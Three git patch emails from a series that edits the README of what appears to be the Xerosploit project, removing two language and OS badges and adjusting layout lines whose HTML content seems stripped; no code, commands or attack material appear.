Xerosploit = From a03ced238fbc60dd9f52dff28e41dda6270b2c57 Mon Sep 17 00:00:00 2001 From: hackerW1 <70388641+hackerW1@users.noreply.github.com> Date: Tue, 10 Aug 2021 11:55:15 +0000 Subject: [PATCH 13/15] cool :sparkles: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4f652fd..524203f 100644 --- a/README.md +++ b/README.md @@ -2,8 +2,8 @@

-[![PyPI](https://img.shields.io/badge/Language-Python3-blue.svg)]() -[![Build](https://img.shields.io/badge/Supported_OS-linux-black.svg)]() + +
From 6d1b1f1f561ad6210cbdf167618fc00ca6859464 Mon Sep 17 00:00:00 2001 From: hackerW1 <70388641+hackerW1@users.noreply.github.com> Date: Tue, 10 Aug 2021 11:56:29 +0000 Subject: [PATCH 14/15] Update README.md --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 524203f..a6a8567 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,7 @@

- + +

From 95e44dd7b0823d77a4ebaad893718f0a1ee5517b Mon Sep 17 00:00:00 2001 From: hackerW1 <70388641+hackerW1@users.noreply.github.com> Date: Tue, 10 Aug 2021 11:56:58 +0000 Subject: [PATCH 15/15] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index a6a8567..167c41b 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@

- +